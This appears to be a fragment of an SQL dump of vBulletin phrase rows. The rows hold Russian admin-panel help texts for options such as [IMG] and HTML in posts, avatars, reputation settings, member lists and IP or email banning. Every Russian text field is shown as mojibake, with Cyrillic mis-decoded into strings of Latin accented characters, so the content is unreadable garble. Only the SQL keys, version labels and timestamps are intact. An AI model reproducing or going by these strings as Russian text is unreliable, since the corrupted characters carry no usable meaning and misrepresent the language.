(23230, -1, 'options_options_allowbbimagecode_text', 'cphelptext', 'Ãðè âêëþ÷åÃèè ýòîé îïöèè, ïîëüçîâà òåëè ñìîãóò èñïîëüçîâà òü BB êîä [IMG] â ìåñòà õ âÃÃ¥ ðà çäåëîâ (äëÿ èñïîëüçîâà Ãèÿ èçîáðà æåÃèé). Ãòîò ïà ðà ìåòð ÃÃ¥ èñïîëüçóåòñÿ îñÃîâÃîé ÷à ñòüþ ôîðóìà , Ãî ìîæåò èñïîëüçîâà òüñÿ â ðà çëè÷Ãûõ äîïîëÃÃ¥Ãèÿõ/ìîäóëÿõ ê ôîðóìó.', 'vbulletin', 'zCarot', 1172666378, '3.6.5'),
(23231, -1, 'options_options_allowbbimagecode_title', 'cphelptext', 'Ãà çðåøèòü èñïîëüçîâà òü êîä [IMG] â ìåñòà õ âÃÃ¥ ðà çäåëîâ', 'vbulletin', 'zCarot', 1172666378, '3.6.5'),
(23232, -1, 'options_options_allowhtml_text', 'cphelptext', 'Ãà ñòîÿòåëüÃî ðåêîìåÃäóåòñÿ ÎÒÊËÞ×ÈÒÜ ýòó îïöèþ.  ïðîòèâÃîì ñëó÷à å ïîëüçîâà òåëè ñìîãóò èñïîëüçîâà òü HTML â ìåñòà õ âÃÃ¥ ðà çäåëîâ, ÷òî ìîæåò áûòü èñïîëüçîâà Ãî çëîóìûøëåÃÃèêà ìè. Ãòîò ïà ðà ìåòð ÃÃ¥ èñïîëüçóåòñÿ îñÃîâÃîé ÷à ñòüþ ôîðóìà , Ãî ìîæåò èñïîëüçîâà òüñÿ â ðà çëè÷Ãûõ äîïîëÃÃ¥Ãèÿõ/ìîäóëÿõ ê ôîðóìó.', 'vbulletin', 'zCarot', 1172666411, '3.6.5'),
(23233, -1, 'options_options_allowhtml_title', 'cphelptext', 'Ãà çðåøèòü èñïîëüçîâà òü HTML â ìåñòà õ âÃÃ¥ ðà çäåëîâ', 'vbulletin', 'zCarot', 1172666411, '3.6.5'),
(23234, -1, 'options_options_ignoremods_text', 'cphelptext', 'Åñëè âêëþ÷èòü ýòó îïöèþ, ïîëüçîâà òåëè ñìîãóò äîáà âëÿòü ìîäåðà òîðîâ è à äìèÃèñòðà òîðîâ â ñâîè ñïèñêè èãÃîðèðîâà Ãèÿ.', 'vbulletin', '', 0, ''),
(23235, -1, 'options_options_ignoremods_title', 'cphelptext', 'Ãîçâîëèòü ïîëüçîâà òåëÿì \"èãÃîðèðîâà òü\" ìîäåðà òîðîâ', 'vbulletin', '', 0, ''),
(23236, -1, 'options_options_avatarenabled_text', 'cphelptext', 'Ãðè âêëþ÷åÃèè îïöèè, ïîëüçîâà òåëè ñìîãóò âûáèðà òü ñåáå à âà òà ðû - Ãåáîëüøèå èçîáðà æåÃèÿ, êîòîðûå îòîáðà æà þòñÿ ðÿäîì ñ èõ èìåÃà ïîëüçîâà òåëåé â ñîîáùåÃèÿõ. Âû ìîæåòå âêëþ÷à òü/âûêëþ÷à òü à âà òà ðû Ãà óðîâÃÃ¥ ãðóïïû ïîëüçîâà òåëåé (Ãðóïïû ïîëüçîâà òåëåé > Óïðà âëåÃèå ãðóïïà ìè ïîëüçîâà òåëåé), ïîñðåäñòâîì ðåãóëèðîâà Ãèÿ âîçìîæÃîñòè èñïîëüçîâà òü à âà òà ðû îïðåäåëåÃÃîé êà òåãîðèè (Àâà òà ðû > Óïðà âëåÃèå à âà òà ðà ìè).', 'vbulletin', '', 0, ''),
(23237, -1, 'options_options_avatarenabled_title', 'cphelptext', 'Àâà òà ðû ðà çðåøåÃû', 'vbulletin', '', 0, ''),
(23238, -1, 'options_options_numavatarswide_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð îïðåäåëÿåò êîëè÷åñòâî êîëîÃîê, â êîòîðûõ áóäóò îòîáðà æà òüñÿ à âà òà ðû â ïà Ãåëè óïðà âëåÃèÿ.', 'vbulletin', '', 0, ''),
(23239, -1, 'options_options_numavatarswide_title', 'cphelptext', 'ÊîëîÃîê äëÿ à âà òà ðîâ', 'vbulletin', '', 0, ''),
(23240, -1, 'options_options_numavatarsperpage_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð îïðåäåëÿåò êîëè÷åñòâî à âà òà ðîâ, êîòîðûå áóäóò îòîáðà æà òüñÿ îäÃîâðåìåÃÃî Ãà êà æäîé ñòðà Ãèöå ðåäà êòèðîâà Ãèÿ à âà òà ðîâ, ðà çáèòîé Ãà êîëîÃêè, èñïîëüçóÿ Ãà ñòðîéêè ïà ðà ìåòðà âûøå - \"ÊîëîÃîê äëÿ à âà òà ðîâ\". \r\n \r\nÃîìÃèòå: Ãòî ÷èñëî äîëæÃî áûòü áîëüøå Ãóëÿ.', 'vbulletin', 'zCarot', 1208955694, '3.7.0 Release Candidate 4'),
(23241, -1, 'options_options_numavatarsperpage_title', 'cphelptext', 'Àâà òà ðîâ Ãà ñòðà Ãèöó', 'vbulletin', '', 0, ''),
(23242, -1, 'options_options_profilepicenabled_text', 'cphelptext', 'Åñëè âû âêëþ÷èòå ýòó îïöèþ, òî ïîëüçîâà òåëè ñìîãóò èñïîëüçîâà òü ôîòîãðà ôèè. Ãòî ìà ëåÃüêèå èçîáðà æåÃèÿ (îáû÷Ãî áîëüøå ÷åì à âà òà ðû), êîòîðûå ïîëüçîâà òåëè ìîãóò çà ãðóçèòü â ñâîè ïðîôèëè. Âû ìîæåòå ðà çðåøèòü èõ äëÿ îòäåëüÃûõ ãðóïï, èñïîëüçóÿ ïà ðà ìåòð \"Ìîæåò çà ãðóæà òü ôîòîãðà ôèè\" â óïðà âëåÃèè ãðóïïà ìè ïîëüçîâà òåëåé.', 'vbulletin', '', 0, ''),
(23243, -1, 'options_options_profilepicenabled_title', 'cphelptext', 'Ãà çðåøèòü ôîòîãðà ôèè', 'vbulletin', '', 0, ''),
(23244, -1, 'options_options_reputationenable_text', 'cphelptext', 'Âêëþ÷à åò è âûêëþ÷à åò ñèñòåìó ðåïóòà öèè ïîëüçîâà òåëåé.', 'vbulletin', '', 0, ''),
(23245, -1, 'options_options_reputationenable_title', 'cphelptext', 'Âêëþ÷èòü ñèñòåìó ðåïóòà öèè ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(23246, -1, 'options_options_reputationhide_text', 'cphelptext', 'Åñëè âû âêëþ÷èòå ýòó îïöèþ, òî ïîëüçîâà òåëè ñìîãóò âûêëþ÷èòü îòîáðà æåÃèå ñâîåé ðåïóòà öèè (ïîëüçîâà òåëè âñå åù¸ ñìîãóò äîáà âëÿòü ðåïóòà öèþ ïîëüçîâà òåëÿì ñ âûêëþ÷åÃÃûì îòîáðà æåÃèåì ðåïóòà öèè).', 'vbulletin', '', 0, ''),
(23247, -1, 'options_options_reputationhide_title', 'cphelptext', 'Ãà çðåøèòü ïîëüçîâà òåëÿì ñêðûâà òü ñâîþ ðåïóòà öèþ', 'vbulletin', '', 0, ''),
(23248, -1, 'options_options_reputationundefined_text', 'cphelptext', 'Ãòî \"îïèñà Ãèå\" ðåïóòà öèè, êîòîðîå áóäåò ïðèñâîåÃî ïîëüçîâà òåëþ ñ ðåïóòà öèåé ìåÃüøå, ÷åì ñà ìûé ìà ëåÃüêèé óðîâåÃü ðåïóòà öèè. Ãà ïðèìåð, åñëè Ãà èìåÃüøà ÿ ðåïóòà öèÿ -300, òî ëþáîìó ïîëüçîâà òåëþ ñ ðåïóòà öèåé -301 èëè ìåÃüøåé áóäåò äà Ãî ýòî îïèñà Ãèå.', 'vbulletin', '', 0, ''),
(23249, -1, 'options_options_reputationundefined_title', 'cphelptext', 'Ãåîïðåäåë¸ÃÃà ÿ ðåïóòà öèÿ', 'vbulletin', '', 0, ''),
(23250, -1, 'options_options_reputationdefault_text', 'cphelptext', 'Ãòî óðîâåÃü ðåïóòà öèè, êîòîðûé áóäåò ïðèñâîåà êà æäîìó ïîëüçîâà òåëþ ïðè ðåãèñòðà öèè. Âû, êà ê à äìèÃèñòðà òîð, äîëæÃû èìåòü óðîâåÃü ðåïóòà öèè âûøå èëè ðà âÃûé ýòîìó ÷èñëó. \r\n\r\nÂû ìîæåòå èçìåÃèòü ýòî çÃà ÷åÃèå, Ãî ïîñëå ðåêîìåÃäóåòñÿ ïåðåñòðîèòü âà øó ðåïóòà öèþ Ãà ôîðóìå, äëÿ ïðèñâîåÃèÿ ñóùåñòâóþùèì ïîëüçîâà òåëÿì óêà çà ÃÃîãî áà çîâîãî óðîâÃÿ.', 'vbulletin', '', 0, ''),
(23251, -1, 'options_options_reputationdefault_title', 'cphelptext', 'Ãåïóòà öèÿ ïî óìîë÷à Ãèþ', 'vbulletin', '', 0, ''),
(23252, -1, 'options_options_showuserrates_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð îïðåäåëÿåò êîëè÷åñòâî ïîñëåäÃèõ ïîëó÷åÃÃûõ îòçûâîâ, îòîáðà æà åìûõ â ïà Ãåëè óïðà âëåÃèÿ.', 'vbulletin', '', 0, ''),
(23253, -1, 'options_options_showuserrates_title', 'cphelptext', 'Êîëè÷åñòâî îòîáðà æà åìûõ îòçûâîâ', 'vbulletin', '', 0, ''),
(23254, -1, 'options_options_adminpower_text', 'cphelptext', 'Îïöèÿ îïðåäåëÿåò ÷èñëî î÷êîâ ðåïóòà öèè, êîòîðûå äîáà âëÿåò èëè ñÃèìà åò à äìèÃèñòðà òîð êà æäûì èçìåÃÃ¥Ãèåì ðåïóòà öèè. Óñòà Ãîâèòå ýòó îïöèþ â 0, ÷òîáû âåñ ðåïóòà öèè à äìèÃèñòðà òîðà âû÷èñëÿëñÿ òà ê æå, êà ê è ó âñåõ îáû÷Ãûõ ïîëüçîâà òåëåé.', 'vbulletin', '', 0, ''),
(23255, -1, 'options_options_adminpower_title', 'cphelptext', 'Âåñ ðåïóòà öèè à äìèÃèñòðà òîðà ', 'vbulletin', '', 0, ''),
(23256, -1, 'options_options_rdpower_text', 'cphelptext', '×åðåç êà æäûå X äÃåé ïîñëå ðåãèñòðà öèè ïîëüçîâà òåëÿ åìó äà åòñÿ äîïîëÃèòåëüÃîå î÷êî ê âåñó ðåïóòà öèè.', 'vbulletin', '', 0, ''),
(23257, -1, 'options_options_rdpower_title', 'cphelptext', 'Ôà êòîð âðåìåÃè ðåãèñòðà öèè', 'vbulletin', '', 0, ''),
(23258, -1, 'options_options_pcpower_text', 'cphelptext', 'Ãîñëå êà æäûõ X ñîîáùåÃèé, ñäåëà ÃÃûõ îïðåäåëåÃÃûì ïîëüçîâà òåëåì, îà ïîëó÷èò åù¸ îäÃî î÷êî ê âåñó ðåïóòà öèè.', 'vbulletin', '', 0, ''),
(23259, -1, 'options_options_pcpower_title', 'cphelptext', 'Ôà êòîð ñîîáùåÃèé', 'vbulletin', '', 0, ''),
(23260, -1, 'options_options_kppower_text', 'cphelptext', 'Çà êà æäûå X î÷êîâ ïîëüçîâà òåëè ïîëó÷à þò îäÃî î÷êî ðåïóòà öèè.', 'vbulletin', '', 0, ''),
(23261, -1, 'options_options_kppower_title', 'cphelptext', 'Ôà êòîð îòçûâîâ', 'vbulletin', '', 0, ''),
(23262, -1, 'options_options_minreputationpost_text', 'cphelptext', 'ÌèÃèìà ëüÃîå êîëè÷åñòâî ñîîáùåÃèé, êîòîðûå äîëæåà ðà çìåñòèòü ïîëüçîâà òåëü, ïðåæäå ÷åì ñìîæåò âëèÿòü Ãà ðåïóòà öèþ äðóãèõ ïîëüçîâà òåëåé.', 'vbulletin', 'zCarot', 1205940637, '3.7.0 Release Candidate 1'),
(23263, -1, 'options_options_minreputationpost_title', 'cphelptext', 'ÌèÃèìóì ñîîáùåÃèé', 'vbulletin', '', 0, ''),
(23264, -1, 'options_options_minreputationcount_text', 'cphelptext', 'Ãòî ìèÃèìà ëüÃûé óðîâåÃü ðåïóòà öèè, êîòîðûé äîëæåà èìåòü ïîëüçîâà òåëü, ÷òîáû âëèÿòü Ãà ðåïóòà öèþ äðóãèõ ïîëüçîâà òåëåé.', 'vbulletin', 'zCarot', 1205940716, '3.7.0 Release Candidate 1'),
(23265, -1, 'options_options_minreputationcount_title', 'cphelptext', 'ÌèÃèìóì ðåïóòà öèè', 'vbulletin', '', 0, ''),
(23266, -1, 'options_options_maxreputationperday_text', 'cphelptext', 'Ãòî ìà êñèìà ëüÃîå êîëè÷åñòâî ïóÃêòîâ ðåïóòà öèè, êîòîðûå ìîæåò äà òü ïîëüçîâà òåëü â òå÷åÃèå 24 ÷à ñîâ. Ãà à äìèÃèñòðà òîðîâ ýòîò ïðåäåë ÃÃ¥ ðà ñïðîñòðà Ãÿåòñÿ.', 'vbulletin', '', 0, ''),
(23267, -1, 'options_options_maxreputationperday_title', 'cphelptext', 'Ñóòî÷Ãûé ïðåäåë äîáà âëåÃèÿ îòçûâîâ', 'vbulletin', '', 0, ''),
(23268, -1, 'options_options_reputationrepeat_text', 'cphelptext', 'Çäåñü óêà çà Ãî êîëè÷åñòâî ðà çëè÷Ãûõ ïîëüçîâà òåëåé, êîòîðûì òðåáóåòñÿ ðà ñïðåäåëèòü ðåïóòà öèþ, ïðåæäå ÷åì èçìåÃèòü å¸ ñÃîâà ó îäÃîãî è òîãî æå ïîëüçîâà òåëÿ. Ãòî îãðà Ãè÷åÃèå ÃÃ¥ ðà ñïðîñòðà Ãÿåòñÿ Ãà à äìèÃèñòðà òîðîâ.', 'vbulletin', '', 0, ''),
(23269, -1, 'options_options_reputationrepeat_title', 'cphelptext', 'ÃðåäóïðåæäåÃèå Ãà êðóòêè ðåïóòà öèè', 'vbulletin', '', 0, ''),
(23270, -1, 'options_options_unallowvbcode_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âêëþ÷åÃà , òî çà ìå÷à Ãèÿ ïîëüçîâà òåëåé ìîãóò ñîäåðæà òü â ñåáå BB êîä, è îà áóäåò ðà ñïîçÃà âà òüñÿ.', 'vbulletin', 'zCarot', 1206964519, '3.7.0 Release Candidate 2'),
(23271, -1, 'options_options_unallowvbcode_title', 'cphelptext', 'Ãà çðåøèòü BB êîäû â çà ìå÷à Ãèÿõ ïîëüçîâà òåëåé', 'vbulletin', 'zCarot', 1206964526, '3.7.0 Release Candidate 2'),
(23272, -1, 'options_options_unallowsmilies_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âêëþ÷åÃà , òî ñìà éëû áóäóò ðà ñïîçÃà âà òüñÿ â çà ìå÷à Ãèÿõ ïîëüçîâà òåëåé.', 'vbulletin', '', 0, ''),
(23273, -1, 'options_options_unallowsmilies_title', 'cphelptext', 'Ãà çðåøèòü ñìà éëû â çà ìå÷à Ãèÿõ ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(23274, -1, 'options_options_unallowimg_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âêëþ÷åÃà , òî BB êîä [IMG] ìîæÃî áóäåò èñïîëüçîâà òü â çà ìå÷à Ãèÿõ ïîëüçîâà òåëåé, è îà áóäåò ðà ñïîçÃà âà òüñÿ.', 'vbulletin', '', 0, ''),
(23275, -1, 'options_options_unallowimg_title', 'cphelptext', 'Ãà çðåøèòü [IMG] â çà ìå÷à Ãèÿõ ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(23276, -1, 'options_options_unallowhtml_text', 'cphelptext', 'Åñëè âû âêëþ÷èòå ýòó îïöèþ, òî ïîëüçîâà òåëè ñìîãóò èñïîëüçîâà òü HTML êîä â çà ìå÷à Ãèÿõ ïîëüçîâà òåëåé, è îà áóäåò ðà ñïîçÃà âà òüñÿ. (Ãòî Ãà ñòîÿòåëüÃî ÃÃ… ðåêîìåÃäóåòñÿ!)', 'vbulletin', '', 0, ''),
(23277, -1, 'options_options_unallowhtml_title', 'cphelptext', 'Ãà çðåøèòü HTML â çà ìå÷à Ãèÿõ ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(23278, -1, 'options_options_enablememberlist_text', 'cphelptext', 'Ãòà îïöèÿ âêëþ÷à åò îòîáðà æåÃèå ñïèñêà ïîëüçîâà òåëåé. Ñïèñîê ïîëüçîâà òåëåé ïîêà çûâà åò âñåõ ïîëüçîâà òåëåé, êîòîðûå ñîñòîÿò â ãðóïïà õ ñ óñòà ÃîâëåÃÃîé îïöèåé \"Îòîáðà æà òü â ñïèñêå ïîëüçîâà òåëåé\".', 'vbulletin', '', 0, ''),
(23279, -1, 'options_options_enablememberlist_title', 'cphelptext', 'Âêëþ÷èòü ñïèñîê ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(23280, -1, 'options_options_memberlistposts_text', 'cphelptext', 'Ãîëüçîâà òåëè, êîòîðûå îáû÷Ãî îòîáðà æà þòñÿ â ñïèñêå ó÷à ñòÃèêîâ, ÃÃ¥ áóäóò îòîáðà æà òüñÿ â øì äî òåõ ïîð, ïîêà ÃÃ¥ Ãà áåðóò ýòîãî êîëè÷åñòâà ñîîáùåÃèé. \r\n\r\nÃòî ìîæåò áûòü èñïîëüçîâà Ãî äëÿ ïðåäîòâðà ùåÃèÿ îòîáðà æåÃèÿ ñïèñêà Ãîâè÷êîâ.', 'vbulletin', '', 0, ''),
(23281, -1, 'options_options_memberlistposts_title', 'cphelptext', 'ÌèÃèìà ëüÃîå ÷èñëî ñîîáùåÃèé', 'vbulletin', '', 0, ''),
(23282, -1, 'options_options_memberlistfields_text', 'cphelptext', 'Óêà æèòå, êà êèå ñòðîêè ïðîôèëÿ áóäóò îòîáðà æåÃû â ñïèñêå ïîëüçîâà òåëåé .', 'vbulletin', '', 0, ''),
(23283, -1, 'options_options_memberlistfields_title', 'cphelptext', 'Ãîëÿ ñïèñêà ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(23284, -1, 'options_options_memberlistperpage_text', 'cphelptext', 'Ãòà îïöèÿ ïîçâîëÿåò îïðåäåëèòü, êà êîå ÷èñëî ïîëüçîâà òåëåé Ãà îäÃó ñòðà Ãèöó áóäåò îòîáðà æà òüñÿ â ñïèñêå ïîëüçîâà òåëåé ôîðóìà . \r\n \r\nÃîìÃèòå: Ãòî ÷èñëî äîëæÃî áûòü áîëüøå Ãóëÿ.', 'vbulletin', 'zCarot', 1208966131, '3.7.0 Release Candidate 4'),
(23285, -1, 'options_options_memberlistperpage_title', 'cphelptext', 'Ãîëüçîâà òåëåé Ãà ñòðà Ãèöó', 'vbulletin', '', 0, ''),
(23286, -1, 'options_options_usememberlistadvsearch_text', 'cphelptext', 'Åñëè âû âêëþ÷èòå ýòó îïöèþ, òî ïîëüçîâà òåëè ñìîãóò èñïîëüçîâà òü ðà ñøèðåÃÃûé ïîèñê ïî ñïèñêó ïîëüçîâà òåëåé.', 'vbulletin', '', 0, ''),
(23287, -1, 'options_options_usememberlistadvsearch_title', 'cphelptext', 'Ãà çðåøèòü ðà ñøèðåÃÃûé ïîèñê', 'vbulletin', '', 0, ''),
(23288, -1, 'options_options_profilelastpost_text', 'cphelptext', 'Åñëè âû âêëþ÷èòå ýòó îïöèþ, òî ïîñëåäÃåå ñîîáùåÃèå ïîëüçîâà òåëÿ áóäåò îòîáðà æà òüñÿ â åãî ïðîôèëå. Ãòî ìîæåò ïðèâåñòè ê ó÷à ùåÃèþ áëîêèðîâêè ñòðà Ãèö ïðè ïîèñêå Ãà áîëüøîì ôîðóìå, ÷òî ïðèâåä¸ò òà êæå è ê óâåëè÷åÃèþ çà ãðóçêè ñåðâåðà . Ãòà îïöèÿ ìîæåò áûòü âêëþ÷åÃà òîëüêî Ãà ìà ëåÃüêèõ ôîðóìà õ.', 'vbulletin', '', 0, ''),
(23289, -1, 'options_options_profilelastpost_title', 'cphelptext', 'Ãîêà çûâà òü ïîñëåäÃåå ñîîáùåÃèå â ïðîôèëå', 'vbulletin', '', 0, ''),
(23290, -1, 'options_options_enablebanning_text', 'cphelptext', 'Åñëè âû âêëþ÷èòå ýòó îïöèþ, òî Ãèæåðà ñïîëîæåÃÃûå îïöèè áëîêèðîâêè áóäóò äîñòóïÃû.', 'vbulletin', '', 0, ''),
(23291, -1, 'options_options_enablebanning_title', 'cphelptext', 'Âêëþ÷èòü îïöèè áëîêèðîâêè', 'vbulletin', '', 0, ''),
(23292, -1, 'options_options_banip_text', 'cphelptext', 'Ââåäèòå ëþáûå IP à äðåñà , êîòîðûå âû æåëà åòå çà áëîêèðîâà òü, ðà çäåëÿÿ èõ ïðîáåëà ìè. Âû ìîæåòå ââåñòè ïîëÃûé IP à äðåñ èëè åãî ÷à ñòü. Ôîðóì Ãà ÷èÃà åò ïðîâåðÿòü IP à äðåñ ñ ìîìåÃòà óñòà Ãîâêè ñîåäèÃÃ¥Ãèÿ. Âû äîëæÃû áûòü î÷åÃü îñòîðîæÃû ñ áëîêèðîâêîé ïî IP, îñîáåÃÃî ñ ÷à ñòè÷Ãûì ââîäîì, ïîñêîëüêó âû ìîæåòå çà áëîêèðîâà òü ÃåâèÃÃûõ ïîëüçîâà òåëåé, åñëè ââåä¸òå õîòÿ áû îäÃó Ãåïðà âèëüÃóþ öèôðó.', 'vbulletin', 'zCarot', 1224672498, '3.8.0 Beta 2'),
(23293, -1, 'options_options_banip_title', 'cphelptext', 'Çà áëîêèðîâà ÃÃûå IP à äðåñà ', 'vbulletin', '', 0, ''),
(23294, -1, 'options_options_banemail_text', 'cphelptext', 'Ââåäèòå à äðåñà ýëåêòðîÃÃîé ïî÷òû èëè ñèìâîë @ è äîìåÃû ýëåêòðîÃÃîé ïî÷òû, ðà çäåëÿÿ èõ ïðîáåëà ìè, ÷òîáû çà ïðåòèòü ðåãèñòðà öèþ ïîëüçîâà òåëåé, åñëè ââåä¸ÃÃûé èìè à äðåñ ýëåêòðîÃÃîé ïî÷òû èëè åãî ÷à ñòü Ãà õîäèòñÿ â óêà çà ÃÃîì âà ìè ñïèñêå. \r\nÂû ìîæåòå èñïîëüçîâà òü ÷à ñòü à äðåñà , ââåäÿ ñèìâîë @ è çà òåì äîìåÃÃûå èìåÃà , Ãà ïðèìåð: @example.com. Òà ê âû ìîæåòå ïðåäîòâðà òèòü ðåãèñòðà öèþ ñ Ãåæåëà òåëüÃûìè à äðåñà ìè ýëåêòðîÃÃîé ïî÷òû.', 'vbulletin', '', 0, ''),
(23295, -1, 'options_options_banemail_title', 'cphelptext', 'Çà áëîêèðîâà ÃÃûå à äðåñà ýëåêòðîÃÃîé ïî÷òû', 'vbulletin', '', 0, ''),
(23296, -1, 'options_options_aggressiveemailban_text', 'cphelptext', 'Ãòà îïöèÿ ïîçâîëÿåò ðà ñøèðèòü äåéñòâèå áëîêèðîâêè ïî ýëåêòðîÃÃîé ïî÷òå. Åñëè âû âêëþ÷èòå å¸, òî à äðåñ ýëåêòðîÃÃîé ïî÷òû, êîòîðûé ñîäåðæèò îäÃî èç ñëîâ ïà ðà ìåòðà \"Çà áëîêèðîâà ÃÃûå à äðåñà ýëåêòðîÃÃîé ïî÷òû\" áóäåò à âòîìà òè÷åñêè ðà ñöåÃèâà òüñÿ êà ê çà áëîêèðîâà ÃÃûé. \r\n \r\nÅñëè âû ÃÃ¥ âêëþ÷èòå ýòó îïöèþ, òî çà áëîêèðîâà Ãû áóäóò òîëüêî à äðåñà , êîòîðûå çà êà Ã÷èâà þòñÿ ââåä¸ÃÃîé âûøå ñòðîêîé. Ãðèìåðû: \r\nÂêëþ÷åÃî: Ãëîêèðîâêà ïî ñëîâó \"example\" çà áëîêèðóåò êà ê example@something.com, òà ê è something@example.com. \r\nÂûêëþ÷åÃî: Ãëîêèðîâêà ïî ñëîâó \"example\" ÃÃ¥ çà áëîêèðóåò Ãè÷åãî. Åñëè âû æåëà åòå çà áëîêèðîâà òü something@example.com, òî âà ì ñëåäóåò ââåñòè \"example.com\".', 'vbulletin', 'zCarot', 1155818986, '3.6.1'),
(23297, -1, 'options_options_aggressiveemailban_title', 'cphelptext', 'Ìà ñêà áëîêèðîâêè ïî à äðåñó ýëåêòðîÃÃîé ïî÷òû', 'vbulletin', 'zCarot', 1190714698, '3.7.0 Beta 1'),
(23298, -1, 'options_options_allowkeepbannedemail_text', 'cphelptext', 'Èñïîëüçóÿ ýòó îïöèþ, âû ìîæåòå çà ïðåòèòü ïîëüçîâà òåëÿì îñòà âëÿòü ÃåèçìåÃÃûì ñâîé à äðåñ ýëåêòðîÃÃîé ïî÷òû ïîñëå òîãî, êà ê îà áûë çà áëîêèðîâà Ã. Åñëè óñòà Ãîâèòü ýòó îïöèþ â \"Ãåò\", ïðè ñëåäóþùåé à âòîðèçà öèè ëþáîé ïîëüçîâà òåëü, èìåþùèé çà áëîêèðîâà ÃÃûé à äðåñ ýëåêòðîÃÃîé ïî÷òû äîëæåà áóäåò îáÃîâèòü ñâîé ïðîôèëü è ââåñòè Ãîâûé à äðåñ ýëåêòðîÃÃîé ïî÷òû.', 'vbulletin', '', 0, ''),
(23299, -1, 'options_options_allowkeepbannedemail_title', 'cphelptext', 'Ãà çðåøèòü ïîëüçîâà òåëÿì îñòà âèòü çà áëîêèðîâà ÃÃûé ýëåêòðîÃÃîé ïî÷òû', 'vbulletin', '', 0, ''),
(23300, -1, 'options_options_globalignore_text', 'cphelptext', 'Óêà æèòå òåõ ïîëüçîâà òåëåé, êîòîðûå áóäóò ïîëÃîñòüþ èãÃîðèðîâà òüñÿ. Èõ ñîîáùåÃèÿ è ò.ä. ÃÃ¥ áóäåò âèäåòü Ãèêòî, êðîìå Ãèõ ñà ìèõ. Ãòî ñîçäà ñò èì âèäèìîñòü òîãî, ÷òî îÃè äî ñèõ ïîð ÿâëÿþòñÿ äåéñòâóþùèìè ïîëüçîâà òåëÿìè ôîðóìà , êîãäà Ãà ñà ìîì äåëå Ãèêòî ÃÃ¥ âèäèò èõ ñîîáùåÃèé. Ââåäèòå ñïèñîê id ïîëüçîâà òåëåé, ðà çäåëåÃÃûõ ïðîáåëà ìè.', 'vbulletin', '', 0, ''),
(23301, -1, 'options_options_globalignore_title', 'cphelptext', '\"Ãåïå÷à òÃûå\" ïîëüçîâà òåëè', 'vbulletin', '', 0, ''),
(23302, -1, 'options_options_allowedbbcodes_text', 'cphelptext', 'Ãòà îïöèÿ ïîçâîëÿåò âêëþ÷à òü è âûêëþ÷à òü âñå âñòðîåÃÃûå BB êîäû. \r\nÂûêëþ÷à ÿ BB êîäû, âû ïðåäîòâðà ùà åòå èõ îáðà áîòêó ãäå-ëèáî Ãà ôîðóìå, âêëþ÷à ÿ ïîäïèñè, ëè÷Ãûå ñîîáùåÃèÿ, çà ìå÷à Ãèÿ ïîëüçîâà òåëåé è ò.ä.', 'vbulletin', 'zCarot', 1206966046, '3.7.0 Release Candidate 2'),
(23303, -1, 'options_options_allowedbbcodes_title', 'cphelptext', 'Ãà çðåøèòü âñòðîåÃÃûå BB êîäû', 'vbulletin', '', 0, ''),
(23304, -1, 'options_options_codemaxlines_text', 'cphelptext', 'Code îòîáðà æà åò áëîê ôîðìà òèðîâà ÃÃîãî òåêñòà , êîòîðûé ÃÃ¥ áóäåò ðà çäâèãà òü ãðà Ãèö òà áëèöû ôîðóìà Ãåçà âèñèìî îò ñâîåãî ðà çìåðà . Ãòî çÃà ÷åÃèå îïðåäåëÿåò ìà êñèìà ëüÃûé âåðòèêà ëüÃûé (â ñòðîêà õ) ðà çìåð òà êîãî ïîëÿ. Ã’.Ã¥. ýòèì çÃà ÷åÃèåì îïðåäåëÿåòñÿ ìà êñèìà ëüÃà ÿ âûñîòà (â ñòðîêà õ) áëîêà code.  ñëó÷à å, åñëè áëîê ÃÃ¥ óìåùà åòñÿ â ýòîò ðà çìåð, áóäåò èñïîëüçîâà Ãà ïîëîñà ïðîêðóòêè.', 'vbulletin', 'zCarot', 1205942159, '3.7.0 Release Candidate 1'),
(23305, -1, 'options_options_codemaxlines_title', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî ñòðîê BB êîäà [CODE]', 'vbulletin', '', 0, ''),
(23306, -1, 'options_options_quickedit_text', 'cphelptext', 'Ãûñòðîå ðåäà êòèðîâà Ãèå ïîçâîëÿåò ðåäà êòèðîâà òü ñîîáùåÃèÿ ïðÿìî â òåìå. Åñëè îáîçðåâà òåëü ïîëüçîâà òåëÿ ÃÃ¥ ïîääåðæèâà åò áûñòðîå ðåäà êòèðîâà Ãèå, òî åãî ïåðåÃà ïðà âÿò Ãà îáû÷Ãóþ ñòðà Ãèöó ðåäà êòîðà . Ãîëüçîâà òåëè ìîãóò ïåðåéòè ê îáû÷Ãîìó ðåäà êòîðó â ëþáîå âðåìÿ, Ãà æà â Ãà êÃîïêó \"Ãà ñøèðåÃÃûé ðåæèì\". Ãðåèìóùåñòâîì áûñòðîãî ðåäà êòîðà ÿâëÿåòñÿ òî, ÷òî ïîëüçîâà òåëÿ ÃÃ¥ ïåðåÃà ïðà âÿò Ãà Ãîâóþ ñòðà Ãèöó äëÿ ðåäà êòèðîâà Ãèÿ ñîîáùåÃèÿ, à òà êæå ïîñëå ðåäà êòèðîâà Ãèÿ åìó, îïÿòü æå, ÃÃ¥ ïðèä¸òñÿ ïåðåçà ãðóæà òü å¸.', 'vbulletin', '', 0, ''),
(23307, -1, 'options_options_quickedit_title', 'cphelptext', 'Ãûñòðîå ðåäà êòèðîâà Ãèå', 'vbulletin', '', 0, ''),
